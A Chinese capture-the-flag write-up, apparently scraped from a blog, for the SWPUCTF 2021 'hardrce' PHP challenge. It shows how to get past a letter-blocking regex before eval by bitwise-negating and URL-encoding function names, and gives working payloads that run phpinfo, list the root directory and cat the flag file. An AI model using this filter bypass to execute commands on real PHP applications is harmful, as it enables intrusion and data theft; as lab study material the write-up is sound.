NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第1张图片

代码审计:

使用get方式请求给wllm传参

使用preg_match函数正则匹配过滤掉了一些符号

'\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`'

以及 [a-zA-Z] 即所有的大小写字母

如果传入内容满足这些条件则会执行eval函数

URL编码取反绕过正则实现RCE:

直接传入肯定不行

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第2张图片

此时我们可以对需要使用的函数进行取反,然后再进行URL 编码;

在发送 payload 的时候将其取反,便可还原代码;

因为取反操作后基本上用的都是不可见字符,所以不会触发正则匹配。

对于没有参数的函数,比如phpinfo();

这里没有过滤括号和分号,所以我们对phpinfo取反编码再取反即可

使用~对phpinfo进行取反操作,再使用urlencode函数对其进行编码

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第3张图片

得到 %8F%97%8F%96%91%99%90

构造payload:?wllm=(~%8F%97%8F%96%91%99%90)();   #phpinfo();

传入之后成功回显

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第4张图片

注意:在使用取反编码再取反进行绕过时,想要执行我们指定的代码,传入的payload必须要满足 (函数名)() 这样的形式,否则在取反之前PHP解释器并不知道是要执行一个函数,取反之后就算是一个函数也不会被当作代码执行。

我们可以验证一下,如果将phpinfo()整体取反编码再取反,是否会执行呢?

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第5张图片

得到%8F%97%8F%96%91%99%90%D7%D6

构造payload:?wllm=(~%8F%97%8F%96%91%99%90%D7%D6);   

按道理来说它也是 phpinfo();

但是传入之后发现代码并没有被执行

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第6张图片

因此我们在使用这种方法的时候一定要注意满足要求的格式

接下来我们介绍有参数的函数:

同样需要满足上述要求,不同的是需要分别对其中的字符进行编码

比如我们想执行system('ls /');

分别对 system 和 ls / 进行取反、编码,输出"\n"是用来换行

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第7张图片

得到

%8C%86%8C%8B%9A%92

%93%8C%DF%D0

再分别对它们再次进行取反操作

构造payload:?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第8张图片

命令执行成功,发现存在名为flllllaaaaaaggggggg的文件

我们尝试获取它

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第9张图片构造payload: ?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)_第10张图片

拿到flag

NSSCTF{36209fa9-5341-4a17-b668-ac020cdee0e6} 

你可能感兴趣的:(PHP,web,CTF,WAF绕过,php,正则表达式,web安全,rce)